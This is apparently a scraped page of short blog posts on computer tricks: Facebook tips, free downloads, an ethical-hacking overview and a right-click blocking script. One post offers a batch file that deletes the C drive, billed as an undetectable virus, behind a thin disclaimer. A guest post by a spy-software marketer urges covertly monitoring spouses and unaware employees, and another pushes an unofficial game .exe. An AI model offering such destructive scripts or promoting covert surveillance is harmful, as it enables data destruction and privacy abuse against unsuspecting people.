Geekedcat- covering the uncovered.

There are a number of blogs out there which provides reviews about gadgets. Some of them cover device specifications and some cover advanced topics.

12745821_537981719713641_4952691916757700707_n

But I was wandering through infinite web I visited this website www.geekedcat.com

What I like the most was the topic they cover and the way they
explain.

This is a noob friendly website, they use images and gif to describe the topics. 

Visit their site explore the stuff and don’t forget to comment.

 

How To Create Computer Virus In A Minute

system-failure

 

Today am gonna tell you how to create very powerful and dangerous computer virus using a simple batch file without making use of any external software. We simple make use of the NOTEPAD. One of the interesting thing in this trick is it can’t be detected by any of the Anti Virus software.

Now lets learn how to create the virus file

Open the Notepad and copy the code give below :

@Echo off

                               Del C:\ *.* |y

Now save the file as damage.bat ( you can give any name to the file, but .bat extension is must)

Finally run the file you have created, you are done !! That will delete all the supported files of C drive

 

NOTE: PLEASE DON’T TRY THIS ON YOU OWN COMPUTER, IT MAY DELETE ALL THE FILES OF YOUR C DRIVE, I JUST WROTE THIS POST OF GENERAL AWARENESS, I AM NO WAY RELATED FOR ANY DAMAGE DONE TO YOUR COMPUTER.

Cell phone spy software for the sneak in

Are you really aware of cell phone spy software? It is magic software used to uncover all cell phone activities secretly.

mobile_spy

Cell phones are considered as the most common means of private communication. Cell phone conversation or text messaging are considered safer and mostly adopted for personal communication. It might be possible that your employees, kids or even your spouse might be having mysterious secret activities. They must use their cell phones for some extent. You can get hold of the dilemma. If the activities are not properly monitored, the situation may get worse and may cause you heavy financial loss or even mental stress. Do you want to be aware and want to update yourself about your employees or beloved cell phone activities?

Cell Phone Spy Software Benefits 

Why use spy software?

The software has numerous advantages as explained below:

A check on your spouse’s infidelity

If you want to measure your spouse’s loyalty or honesty, spy software is the best and economical solution. Cheating spouse is an abuse and often leads to separation. It cause you financial and time loss. Any doubt on your spouse’s character will give you mental stress. Through Cell phone spy software you will be able to have a close watch on your spouse’s all cell phone activities including text messages, emails and call logs. You can listen to any telephonic conversation of the target phone. This will help you in measuring your spouse’s honesty.

Spy software for better control on your kids activities

Kids are innocent and often prove to be an easy source of information leakage. If you want to keep a watch on your kid’s cell phone and want to know whether they are not talking to any suspicious person on their cell phones. Spy software is big solution to the problem. You will be well informed about their location in addition to cell phone activities. In case of lost, the built-in GPS feature will locate their position immediately.

Manage your business while having an eye on employee’s cell Phones

For any successful business, it is very important to have an update about your employee’s activities. Business failure is mostly due to business secret leaks. You must have a mechanism to have a control over your employee’s cell phones. Spy software has enriched features and will keep a check on all communication takes place and vigilant enough to monitor all activities through your company’s cell phones. Big advantage of using spy software is that your employees will be completely unaware about their monitoring and they will use their phone as they do in routine.

For better control and keeping yourself update, use spy software for checking the mobile phone activities of your spouse, employees and kids.

Without spy software you will have to hire a private agent to spy on the target cell phone activities which is a very expensive and difficult job. Access to private conversation without owner’s permission is another hurdle and is nearly impossible even for a skilled private detective.

It might look unethical and sometimes may unknowingly appear awkward if you do attempts to check and sneak on your employees or beloved cell phone. The spy software will bypass you all these hurdles and will make the way easy for you. Now with spy software for cell phone, you can spy your wife or husband, kids and employees using only your cell phone.

Post is contributed by Katrin, blogger who enjoys writing about mobile tricks and hacks. Marketing manager in the international company that develops spy software mSpy handy überwachung.

 

Facebook Photo Comments

Facebook has begun to roll our photo comments for all users. The new feature allows users to share images as comments on posts. The feature will be made available for user to user interactions, and it is an option to comment on page posts, as well.

Previously, Facebook would allow users to share an image as a comment by posting a link. It would then pull the image as a thumbnail for easy viewing. With this update, Facebook removes this middle step and allows users upload their images directly from their computer. These images appear larger than those shared by links and are hosted directly on Facebook. Users will not need to take the time to upload an image through a hosting site such as Imgur,photobucket  or many others.

Enoch Joy

This new feature was built in a hackathon by Facebook engineers and is being rolled out globally for all users today. Facebook engineer Bob Baldwin, who helped build this feature has said, “I hope this will make threads with friends more expressive and engaging.”

Currently, photo comments can only be uploaded on the desktop and mobile browser sites, but are currently viewable on the native applications.

Readers: Are you going to use photo comments?

Here I provide few funny Troll photos which you can use them in photo comments.

These troll which am providing is one of my collection on photo comments, You can use them in your conversation and have much fun in commenting.

Click download to download the Zip file where I have provided few troll photos which can be  used for photo commenting

All you have to do is download the zipped file and extract that file, you are done!!

So guys…Happy photo commenting !! 🙂

images

How To See Facebook Private Profile Pictures In Full Size

As we know that when we keep security for our profile picture we cannot view it in full size.

Now here is a trick which helps you to see the profile picture in full size even when the security is provided.

Follow the few simple steps give below:

Step1:-

Move your cursor to the profile picture and right click on it..select the option open the image in new tab

You will be getting some thing like this :

remove s160x160

 

Step2:

What you to do is..remove that s160x160 from the url. 

This is what going to happen when you do that..

picture in full size

Now you can see the profile picture in full size .

 

Download E-books For Free

Samples : Free E-Books Download

 

Software E Book Sample

:

JAVA SPRING  free  Download 

 

Competitive Exams

SAMPLE IELTS PRACTICE TESTS free download

INTERVIEW PAPERS

SAMPLE INTERVIEW PAPERS free  download

For more visit:   E-Books

Guest Posting by

Dinesh ( E-Books)

How To Download Subway Surfer Game For PC

Subway-Surfers-for-PC

As we all know that Subway surfer is one of the most popular game that gave tough competition for Temple Run. I think there is no need to give special introduction about this game. But the thing is it is an android app and can be played only on smartphones. Unfortunately many of us don’t have the smart phone.

Have you ever thought of playing this game in your PC? Is that possible ??

The answer is YES!!! now we can play this android game in our PC including windows 7/8 and all versions of XP. Isn’t that Awesome !!

So, How to get this game and where to download this ?? Read the post completely, you will get the answer 🙂

Subway-Surfers-for-PC

Here we go,

The thing is that Subway Surfer for PC is not illegal to use and also not provided officially, It’s all about Android Emulator which help us to play this game Subway Surfer on PC(Windows and Mac) Or the other method is we can download the game directly, get installed in our PC and run it…

Here  I provide the few simple steps which are very easy to follow to download the Subway Surfer PC for Free.

Step-1

Click Here To Free Download Subway Surfer for PC. It will download the .exe file

Step-2

Double Click on the file and install it into you PC

subway-surfers-pc-installation

Step-3

It will get installed into your system and you will find the game’s icon on desktop.

Step-4

Click on the icon to play the game on PC for Free.

Step-5

You are done!!

Now you can play Subway Surfer PC game for free…Isn’t it simple !!

Note: Make use of the mouse for the controls of the game 

How To Make Your Facebook Secure

Security plays the major role in social networking sites…especially when we come to Facebook..

We don’t want our ID to get hacked and post something that embarrasses you!! Here I provide few tips which secure you account.

 

techiesupport

  • Make sure that you change you FACEBOOK PASSWORD frequently.
  • Do not log in to any stranger’s device to Facebook, there is  a possibility of key loggers destroy here.
  • If you have mobile number verification system don’t even give your mobile to any person,make sure that the person can’t even guess the recovery number.
  • Enabling secure browsing in Facebook prevents upto 90% of hack attacks.
  • Don’t log in to any pages that ask you to provide your ID and Password. It may lead to phishing attack.
  • Many hackers start their attack from the EMail ID of your account, make sure that your EMail is hidden in your Facebook ID.
  • Do not allow any unknown apps in you account.
  • Never open any links which say that they will provide free recharge or some crap, its a kinda trap were they steal our passwords.

Follow these few simple tips and make your account secure !! 🙂

Learn Ethical Hacking

Learn Ethical Hacking (Posted by Astalavista)

People and companies alike are becoming more involved with using the Internet as their means of communication and for data storage and sharing. The sheer amount of information on the Internet has increased the need for ethical hacking experts who will be able to secure the data fromanonymous malicious people who are interested in breaching security for profit, malice, or even for fun. This article takes a look at what you need to do in order to learn ethical hacking.

What is ethical hacking?

Ethical hacking is the process in which a hacker does not try to break into an organization’s computer security for malice, but to determine vulnerabilities in order for these to be eliminated in order to enhance the system’s security. Ethical hackers work with organizations so that the security settings can be changed to make these less vulnerable to any breaches done by malicious hackers.

Ethical hacking training

A person who wants to become an ethical hacker will need to pick up a certain skill set before he or she can actually practice ethical hacking. While there are those who became involved in ethical hacking through practice (with some of them actually being reformed hackers), there are now more people who are receiving proper training in order to learn how to use ethical hacking tools.

Some of the things that you will learn when you are being trained in ethical hacking are:
IT. Ethical hackers will need to have IT know-how in order to do their job effectively. Programming skills are especially important, and someone who does ethical hacking will need to be acquainted with several programming languages, including but not limited to HTML, Java, and C++. They should also need to familiarize themselves with the various kinds of operating systems, and should have in-depth knowledge about both computer hardware and software. Students will also be taught how to troubleshoot computers, as well as what they need to do should a system become infected with a computer virus or some other kind of malware.
Security. Security is an integral part in the training in ethical hacking, since ethical hackers will be highly involved in ensuring computer security. They will need to be trained in vulnerability testing so that they will be able to identify if a computer’s security system has any weaknesses. Students will also be taught how to hack systems as well, so that they will know what to expect and how to counter hacking attacks.
Ethics. While you will be taught hard skills, you will also need to receive training in the ethics of hacking, an integral part of which is the laws in hacking. This is particularly important because of the fact that some states do not distinguish between malicious hacking and ethical hacking, and you can get prosecuted if you stepped the line between the two. Furthermore, companies will be putting a lot in your hands when they entrust their security to you, so you will need to learn proper ethics so that you will be able to do your job properly.

Other skills. While this cannot actually be trained, it is vital for those who want to become involved in ethical hacking to have a high level of patience and alertness. Malicious hackers are very patient individuals, able to wait even for months while they monitor the activities and the systems of their intended victims. As such, ethical hackers need to be always on the alert for any possibilities of breach to make sure that the network is still secure. Those involved in ethical hacking also need to be prepared to think outside the box. Hackers are extraordinarily creative people and can find so many ways in which they can penetrate the system, which is why ethical hackers will need to match them wit for wit in order to keep the system secure.
The training can be a full-fledged college course, or it could just be an intensive course that runs for a span of a few days to a few weeks. However, training isn’t your last stop in order to become an ethical hacker, as a person who is interested in ethical hacking will also need to get certified before he or she can practice in the profession. The CEH certifies ethical hackers, and it also provides training modules that give ethical hacking experts updated information on how they can do their job more efficiently.

Ethical hacking will require a lot of skills from those who want to get involved in this line of work, and those who will be working officially as ethical hackers will need to get licensed before they can practice in this profession. Even so, the high demand for ethical hackers as well as the potential for earning a high salary has made a lot of people interested in receiving training in ethical hacking.

Guest Posting By Astalavista (www.astalavista.com)

How To Avoid Copying Content From Your Blog

right_click_disable

Beeing an owner of a blog or website you always want to secure your content from other bloggers by copying the content from your blog.

You might have made lots of research and written an article for your blog with great efforts and many others will just try to copy past them to their blog.

To prevent such kinda things…here i provide the great java script trick   that disables the right click button on your blog.

Just follow the few simple steps shown below :

Step 1 :

Go to your Dashboard  and then click on Layout

techiesupport

Step 2 :

Click on Add Gadgets then select HTML/Javascripts

techiesupport trick

Step 3:

Paste the code give below in the pop up window

<!–MBW Code–>

<script language=’JavaScript1.2′>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function (“return false”)
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!–Code End >

Step 4:

Save it, you are done..

Now users will not be able to right click on your website 🙂